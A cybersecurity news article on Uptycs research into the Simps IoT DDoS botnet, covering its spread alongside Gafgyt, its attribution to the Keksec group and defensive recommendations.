A recently developed botnet named “Simps” has appeared to carry out distributed denial-of-service (DDoS) attacks on gaming targets & others, using internet of things (IoT) nodes. It is part of the toolset used by the Keksec cyber-crime group; researchers commented
The newly discovered malware infects IoT devices in tandem with the prolific Gafgyt botnet, using known security vulnerabilities.
According to the Uptycs’ threat research team, Simps was 1st seen in April being dropped on IoT devices by the Gafgyt botnet. Gafgyt (a.k.a. Bashlite) is a Linux-based botnet that was 1st uncovered in 2014.
Vulnerable IoT Devices
It targets vulnerable IoT devices like Huawei routers, Realtek routers & ASUS devices, which it then uses to launch large-scale DDoS attacks & download next-stage payloads to infected machines. It recently added new exploits for initial compromise, for Huawei, Realtek & Dasan GPON devices.
In the current campaign, Gafgyt infects Realtek (CVE-2014-8361) & Linksys endpoints, & then fetches Simps. Simps itself then uses Mirai & Gafgyt modules for DDoS functionality, according to the analysis, released on Wed
Another variant of the attack uses shell scripts for downloading Simps.
Discussions
The shell script & Gafgyt can deploy various next-stage Simps payloads for several Linux-based architectures, researchers noted, using the Wget utility. Wget is a legitimate software package for retrieving files from web servers using HTTP, HTTPS, FTP & FTPSa.
Once the Simps binary executes, it drops a log file that records the fact that the target device is infected & connects to the command-&-control server (C2).
The infection logs share commonalities, which allowed the researchers to search for references to them across the broader web. This led to the discovery that the Simps author maintains a YouTube channel to offer demonstrations of the botnet’s functionality, & a Discord server to host discussions about the malware.
Early Stages
“The botnet might be in the early stages of development because of the presence of the log file after execution,” researchers observed, noting that leaving behind an easily discoverable artifact like that is not best practice for those trying to stay under the radar.
In any event, they identified a YouTube video created by a user named “itz UR0A,” entitled “Simps Botnet😈, Slamming!!!” – dating from April 24.
The YouTube link also contained a Discord server link for “UR0A”, which was also present in the infection log, the analysis found.
“The Discord server contained several discussions around DDoS activities & botnets carrying different names,” researchers noted. “One binary we identified in a chat conversation named gay.x86 displayed a message that ‘the system is pawned by md5hashguy.’”
Keksec
Thanks to certain Discord server messages, Uptycs attributed the activity to the Keksec group (a.k.a. Kek Security), which is a prolific threat group known for exploiting vulnerabilities to invade multiple architectures with polymorphic tools (these can include Linux & Windows payloads, & custom Python malware).
It’s constantly adding to its arsenal; in Jan., it was seen deploying the FreakOut Linux botnet malware, which does port scanning, information gathering, & data packet & network sniffing, along with DDoS & crypto mining.
IRC Botnets
“The group is actively constructing IRC botnets for the purposes of DDoS operations & crypto-jacking campaigns using both Doge & Monero,” according to a recent Lacework analysis of the group.
As evidence for Simps attribution, Uptycs discovered that one of the Discord messages contained a Gafgyt malware sample that contained an “Infected By Simps Botnet ;)” message.
“This malware dropped a file named ‘keksec.infected.you.log,’ that contained a message ‘you’ve been infected by urmommy, thanks for joining keksec.”
Source Code
Also, Gafgyt is one of Keksec’s most-favoured tools, according to past analysis, & the group is known for mashing up its code with other binaries to create Franken-malware. For instance, Keksec also operates Hybrid MQ-keksec, a botnet created by combining & modifying the source code of Mirai & Gafgyt, Uptycs pointed out.
In the case of Simps, the binaries notably contain modules for launching DDoS attacks against gaming platforms like the Valve Source Engine & OVH. These were also seen in a variant of Gafgyt used by Keksec that targeted Huawei & Asus routers & killed its rival IoT botnets.
Protecting Against Botnets
Uptycs recommended some measures for enterprise users & administrators to identify & protect against botnet attacks:
- Regularly monitor the suspicious processes, events, & network traffic spawned on the execution of any untrusted binary/scripts.
- Always be cautious in executing shell scripts from unknown or untrusted sources.
- Keep systems & firmware updated with the latest releases & patches
https://www.cybernewsgroup.co.uk/virtual-conference-june-2021/